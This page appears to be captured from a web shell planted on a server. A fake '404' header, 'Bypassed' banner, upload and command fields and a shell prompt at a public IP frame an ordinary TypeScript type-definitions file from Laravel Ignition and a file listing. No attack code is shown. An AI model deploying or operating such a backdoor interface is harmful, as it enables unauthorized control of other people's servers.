404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@3.141.202.161: ~ $
import { ErrorSolution, IgnitionConfig, ViewContext, LogLevel } from '@flareapp/ignition-ui';

export type IgniteData = {
    report: IgnitionErrorOccurrence;
    shareableReport: IgnitionErrorOccurrence;
    config: IgnitionConfig;
    solutions: Array<any>;
    shareEndpoint: string | null;
    updateConfigEndpoint: string | null;
    defaultTab: string;
    defaultTabProps: Array<any> | {};
    appEnv: string;
    appDebug: boolean;
};

export type IgnitionErrorOccurrence = {
    notifier: string;
    language: string;
    framework_version: string;
    language_version: string;
    exception_class: string;
    seen_at: number;
    message: string;
    glows: Array<{
        time: number;
        name: string;
        message_level: LogLevel;
        meta_data: any;
        microtime: number;
    }>;
    solutions: Array<ErrorSolution>;
    stacktrace: Array<{
        line_number: number;
        method: string;
        class: string;
        code_snippet: Record<number, string>;
        file: string;
        application_frame: boolean;
    }>;
    context: {
        request: {
            url: string;
            ip: string | null;
            method: string;
            useragent: string;
        };
        request_data: {
            queryString: Record<string, string>;
            body: Record<string, string>;
            files: Array<any>;
        };
        headers: Record<string, string>;
        cookies: Record<string, string | object | boolean>;
        session: Record<string, string>;
        route?: {
            route: string | null;
            routeParameters: Record<string, number | string | null>;
            controllerAction: string | null;
            middleware: Array<string>;
        } | null;
        user?: Record<string, any> | null;
        env?: {
            laravel_version?: string;
            laravel_locale?: string;
            laravel_config_cached?: boolean;
            app_debug?: boolean;
            app_env?: string;
            php_version?: string;
        };
        logs?: Array<{ message: string; level: LogLevel; context: any; microtime: number }>;
        dumps?: Array<{
            html_dump: string;
            file: string;
            line_number: number;
            microtime: number;
        }>;
        queries?: Array<{
            sql: string;
            time: number;
            connection_name: string;
            bindings: Array<any>;
            microtime: number;
        }>;
        git?: {
            hash: string;
            message: string;
            tag: string;
            remote: string;
            isDirty: boolean;
        };
        livewire?: {
            component_alias: string;
            component_class: string;
            component_id: string;
            data: Record<string, any>;
            updates: Array<{
                payload: Record<string, any>;
                type: string;
            }>;
        };
        view: ViewContext | null;
    };
    stage: string;
    message_level: null | string;
    open_frame_index: null | number;
    application_path: string;
    application_version: null | string;
    documentation_links: Array<string>;
};

Filemanager

Name Type Size Permission Actions
components Folder 0755
contexts Folder 0755
hooks Folder 0755
vendor Folder 0755
Ignition.tsx File 2.25 KB 0644
index.tsx File 2.31 KB 0644
module.d.ts File 237 B 0644
shareClient.ts File 2.42 KB 0644
types.ts File 3.21 KB 0644
util.ts File 1.58 KB 0644